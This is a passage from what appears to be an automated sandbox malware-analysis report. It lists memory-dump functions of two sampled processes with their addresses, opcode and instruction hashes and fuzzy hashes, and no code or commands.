                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a67110cb3ba11069b9143f2c83c216b83b89c88af77e420b964f01b177ef532d
                                • Instruction ID: b1c7aca86f0515070190f29006a53501f0c8ba3458c7787295ef8b285c8556da
                                • Opcode Fuzzy Hash: a67110cb3ba11069b9143f2c83c216b83b89c88af77e420b964f01b177ef532d
                                • Instruction Fuzzy Hash: AE01AD75E0D6999FE706FB3888501AC7FB0FF42390F5945B6C044FB292DA382A498B94
                                Function 00007FF848E60C48 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4865dc93d041830cb1257a3c97077b228f007c519de83a2be346b9101c834d0a
                                • Instruction ID: 5eb70eb6cbec1f0c8cf4390a9dbf077fafb3616101225254c25a8931c5664ce9
                                • Opcode Fuzzy Hash: 4865dc93d041830cb1257a3c97077b228f007c519de83a2be346b9101c834d0a
                                • Instruction Fuzzy Hash: 09019A71D0D689AFE706FB7888401AC7FB0FF42340F5941E6D044EB292EA386A48CB81
                                Function 00007FF848E60C50 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a177a93c6cc804b53832386baaf6e70dd8d93f97ced35697afec7039ee006b76
                                • Instruction ID: 35822857a29b173c53e7f0b3783d5374da0813350a98d78c665f97440d6bf3ee
                                • Opcode Fuzzy Hash: a177a93c6cc804b53832386baaf6e70dd8d93f97ced35697afec7039ee006b76
                                • Instruction Fuzzy Hash: 99017870D0D689AFE706FB7488501AC7FB0FF02344F5841E6D044EB292EA386A48CB45
                                Function 00007FF848E6526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 7be9a3577a42f7ade3e9d103fc1fc78cb953cf929383176af6965eed19fcb741
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: C3E0E530E0D0168EF765BA98C0003BD22A5AF84390F950079D92DB72D6CE3ABC419648
                                Function 00007FF848E60B95 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: e208448bd1bb2ebfb66f2a53860c5a90da8d5f2f3a53bda66a14e7d049c7ec83
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: 8AD0A73161D54A4FE745B778D8498547B90FB1F310BD920E1D00CC72A1D61458558701
                                Function 00007FF848E60D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: df7516600ac512f399ea97404ec5dbcf3026a66fb6dca1ee6322c105892dbaf9
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 44E01734A0C60ADFE700FB54C4886AEB7A1FB91361F6082A5C401A7289DB78B684CB84
                                Function 00007FF848E606A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 6ee8c76bf8097fd72ad07efc031bc94fead778ab448a0daf356bb140b92e30e4
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 1AC08C01D1E42F08F405B12E14020ACA2007BC42D0FD00032C01C700C29EAD30C5024E
                                Function 00007FF848E60B18 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 0a3ef425cd6a3e483cf6112a13b8b12f2255a7c9e939f80f6b9675df6606ad5d
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: BCC04C305158098FC954F72DC98595476A0FB0E215BD501D0E40DC7175E66AEC95C745
                                Function 00007FF848E612D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b82c5eda5274fd8e6e0b4412df162d49119f7d3ae3a4052fdd84645068683bd3
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: E9C08C308108088FCA08FB28C88480433A0FB09200BD60090E009C7170E229ECD1C740
                                Function 00007FF848E635AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3baa4261d7915c92556e7884fe521a43e4eb5283c46c842d7277fde00c603ff8
                                • Instruction ID: 3ae70bc0065df3ece72cf79118ce6301fe0b40afd11a1e06dc48f151fa1d8ad3
                                • Opcode Fuzzy Hash: 3baa4261d7915c92556e7884fe521a43e4eb5283c46c842d7277fde00c603ff8
                                • Instruction Fuzzy Hash: 2EC08C0AE0DC2A9AE25A6214042027E0802DF80788F885071E00E872CACF1C2A0106CA
                                Function 00007FF848E606C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 409f002d9ff6d1b62a327699d874886f2c8ca824da1e9b57baa0e6257bc20c7c
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 9EB01200C6E40F04E408317A08420A471407BC4180FC00070D40C70082999D3094034A

                                Executed Functions

                                Function 00007FF848E80D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5Y_H
                                • API String ID: 0-3237497481
                                • Opcode ID: 26090eeac8ec3cea8a4e8b859ff0efbec4bf163352926c9a7b33889869f677b5
                                • Instruction ID: 8ddfc796e03568ff1084fd2dc37d90ec6e4a9a4f9ded134b9007a8c59f0a5325
                                • Opcode Fuzzy Hash: 26090eeac8ec3cea8a4e8b859ff0efbec4bf163352926c9a7b33889869f677b5
                                • Instruction Fuzzy Hash: 76910F71D1CA8D8FE789EB2888693A9BFF1FB56360F4401BAC009D72D6DB791804C720
                                Function 00007FF848E910AF Relevance: 1.3, Instructions: 1313COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f14671bf377b8f1d286f442c975a8b2cd4898434ea02079c46cd766d09cde13a
                                • Instruction ID: d0fcfb0272812abd7b728bcf4a81449317c85c72f9fa6a31410ef521bef0b0f1
                                • Opcode Fuzzy Hash: f14671bf377b8f1d286f442c975a8b2cd4898434ea02079c46cd766d09cde13a
                                • Instruction Fuzzy Hash: F1929031E1C95A9FEA98FB6884517B873A2FF98794F5441B9D40DC3287CF38AC818B45
                                Function 00007FF848E91290 Relevance: 1.2, Instructions: 1249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2babc774ff58baca543b6c23deca3e0634a9b57e242fc6931db7c3073138b396
                                • Instruction ID: fd5eb3ce643fc9465626072c70d3e1b5430dbe20e22f8171e6e0549447a95320
                                • Opcode Fuzzy Hash: 2babc774ff58baca543b6c23deca3e0634a9b57e242fc6931db7c3073138b396
                                • Instruction Fuzzy Hash: 9E929F21E1C95A9FEB98FA2884557B873E2FF98394F5441B8D40DC3287CF79AC828745
                                Function 00007FF848E80E43 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d82f64e0e1f65a9c5be4c0afcfd0ef7e912edd00a696f21c47b764937bd77511
                                • Instruction ID: 9fda63940c805ec0bad40f6c7981a7972653df32faeb6461cb4a78506a58dac6
                                • Opcode Fuzzy Hash: d82f64e0e1f65a9c5be4c0afcfd0ef7e912edd00a696f21c47b764937bd77511
                                • Instruction Fuzzy Hash: C251D271928A5D8FE798EB28C8597B9BFE0FB46365F4002BAC009E33D9DB791411C714
                                Function 00007FF848E80908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: f3d52bd67096cabd63d28afac80bb092e1e7fc990ae3d7eedf2212890a1a5b89
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 1221EA3170CC194FD768EA1CE889DB973D1FF9932170501BAE58EC7125E921EC8287C5
                                Function 00007FF848E80998 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15de91a13ac1c56fca966ed713d018ff237fdb2d2aa175c1b421cf73782f8c0f
                                • Instruction ID: 8bb90911cf8a14bc65c5828789b766451bb49911c8b8bcde73daacc8b770f610
                                • Opcode Fuzzy Hash: 15de91a13ac1c56fca966ed713d018ff237fdb2d2aa175c1b421cf73782f8c0f
                                • Instruction Fuzzy Hash: BE212220B1C9595FE788F62C945A77972C2FF99361F5400BAE40EC33EBDE38AC418695
                                Function 00007FF848E8116D Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 499088d8546310ef84516d946546094d0a5099bb295e46bd59a5ee818c6a1bf2
                                • Instruction ID: 0d3c1d5f3916b3556a54efe1445e88df6965bc2821b36ce17fef0d2a7420a7cb
                                • Opcode Fuzzy Hash: 499088d8546310ef84516d946546094d0a5099bb295e46bd59a5ee818c6a1bf2
                                • Instruction Fuzzy Hash: CD31713190C54A8FEB45FB68C854AAD7BF1FF26350F4905BAC009D7292DB39A941CB50
                                Function 00007FF848E80C25 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c09cb4d9254496e6c467928670a31dec2b9a882ebfbde9974ccdf6eab5381dd4
                                • Instruction ID: 1214eb40f3f9d7c34931d5dceef699195bce9b176f0469943c994949057e9a37
                                • Opcode Fuzzy Hash: c09cb4d9254496e6c467928670a31dec2b9a882ebfbde9974ccdf6eab5381dd4
                                • Instruction Fuzzy Hash: 8921FC36A0D68DAFE716BB7898110EC7B60FF42361F5442B3D048CB183DB382546CBA5
                                Function 00007FF848E808F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: 41dd62a219195f639a4beb3ab434487037677cb0c4e1bf366816a5d90f271fdf
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 7801FC31F0D91E0FD568F01D944A93973C2E7C6A70B551279D84FC3245DE20AC5342C4
                                Function 00007FF848E86AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bcc374734a7ba526c325af07c3087285b426245ba73930949e36c08143ff2b5
                                • Instruction ID: 0b254ceb4659268cad0747195c42848b32eeedf8b432fe28fc9843e799d8932a
                                • Opcode Fuzzy Hash: 0bcc374734a7ba526c325af07c3087285b426245ba73930949e36c08143ff2b5
                                • Instruction Fuzzy Hash: CC21EB30D0892DCFDBA8EB04C495BAAB3B1FB58355F5045F9C00EA32A4CB75ADC08B45
                                Function 00007FF848E86E49 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77b9bf79b815eae3e3245181b7b07f052bc007dd11d9b27fb2e6c6e6286d98e9
                                • Instruction ID: a0c995493ace8c733259586fad4d4ae4e7b32cc65e61771397a5665bd4341af4
                                • Opcode Fuzzy Hash: 77b9bf79b815eae3e3245181b7b07f052bc007dd11d9b27fb2e6c6e6286d98e9
                                • Instruction Fuzzy Hash: A211AC20D1C5098FEB54FB58D84A6BC73E1FF54380F8005B9D84ED32A2EF386D40465A
                                Function 00007FF848E80C38 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 431d7f5eab85f8466126ddcaaa36e898d84c349d4983efa88e4f55e11c4988a9
                                • Instruction ID: f1f3b1c041409ca56abadebc768999c18157d94174677631a6d52a6a530e486d
                                • Opcode Fuzzy Hash: 431d7f5eab85f8466126ddcaaa36e898d84c349d4983efa88e4f55e11c4988a9
                                • Instruction Fuzzy Hash: 2B11AC31A0D68DAFE706FF3888511AC7BA0FF42291F5546F6C044DB292DA38160A8BA5
                                Function 00007FF848E80C40 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d794f3505dacbd0082ba41b46f9e7a86f90e831a657c8db6b819486aa6100a8d
                                • Instruction ID: d333d624d27f0b71beab26173a52e33469b59126781fca2717f9a70cd697482e
                                • Opcode Fuzzy Hash: d794f3505dacbd0082ba41b46f9e7a86f90e831a657c8db6b819486aa6100a8d
                                • Instruction Fuzzy Hash: AD11AD31A0D6899FE706FF3888500AC7FB0FF42390F5541F6C044DB292DA385A49CBA5
                                Function 00007FF848E80C48 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98339198a8b2bccc34b74a92c44dd140db004d9840bafdff8bc85135ef3b94bb
                                • Instruction ID: 5f7ab8b6e2acb53bf22973631f89c7172007dbd8ee51d96236d23a2f36cf58b0
                                • Opcode Fuzzy Hash: 98339198a8b2bccc34b74a92c44dd140db004d9840bafdff8bc85135ef3b94bb
                                • Instruction Fuzzy Hash: ED018C3190D6899FE716FF7488500AC7FB0FF42340F5541E6D044DB292D6385A49CBA1
                                Function 00007FF848E80C50 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b15838ac6800a1202e7a301d27b2ee884f0a714087ad8028c0ec014f2706967
                                • Instruction ID: 63498b848950b3a4d723a49f42d8575ea087548fa2e3d3e5974c8a4df7ff9d49
                                • Opcode Fuzzy Hash: 3b15838ac6800a1202e7a301d27b2ee884f0a714087ad8028c0ec014f2706967
                                • Instruction Fuzzy Hash: BC012834D0D789AFE716FB7488541AD7FB0FF02344F5841E6D444DB292DA385A48CB65
                                Function 00007FF848E86EA1 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction ID: 4d462fd4b4e52762c1eaaf2c4e24c7c7da20e0610bf7f1b5a7e045fc417d3dcf
                                • Opcode Fuzzy Hash: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction Fuzzy Hash: 8401FB3091C41A8EEBA4BA14D899BFC73A0FB54341F9044B9D44ED32A2DE386A958B49
                                Function 00007FF848E86FA8 Relevance: .0, Instructions: 34COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction ID: baceb5edc2580d1ba02437bd803b3e7c2b8211487aef52575d200fede0ff0c28
                                • Opcode Fuzzy Hash: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction Fuzzy Hash: B3F0302091C4098FEAA4FB14D4896BC33A1FF54381F5005B9D84ED32A2EE386E55865D
                                Function 00007FF848E944B0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd410706b24464b9fa5edae100557492bdb7175cf2280ba6ef2b1fabf638ae06
                                • Instruction ID: 44e19a7e5ca416da4b6c6d7f9f6ab350012d1035f97048693c265d2046f434eb
                                • Opcode Fuzzy Hash: dd410706b24464b9fa5edae100557492bdb7175cf2280ba6ef2b1fabf638ae06
                                • Instruction Fuzzy Hash: E4F03A30E0950B8FEB48EB98C4505FEB7B1FF44355F00463AD41AD6289DF7469408B84
                                Function 00007FF848E8526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 1a8185910e699bc6214a87cccf390c313d3b6f4135211ebd64dfd0fe449ba78e
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 17E01A30E0D4068FF760FA98C0003BD22A5AF84380FA50079D92DE72C6CF3AAC419658
                                Function 00007FF848E80B92 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction ID: 46adbc445841ec7a157739a16e6d2ac61d01a96bb315a66bc851221505bfcb6e
                                • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction Fuzzy Hash: C2D0A73195E98B8FE785B738DC95854BFA0FF1F314BC910D6D04CC72A2E6554898C701
                                Function 00007FF848E80D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: 52992cf1c16fdb706f6debe560519456def7e2a2e55aa8ebaf8fff9ec8b9ce2e
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 63E01734B0C20ADFE700FF54C4846AEB7A1FB91361F6082A5C40187299DB78A684CA84
                                Function 00007FF848E94CA3 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 7a79b426275232e89dabfd7748385095164f346f6046cb1f23b3412b53520a00
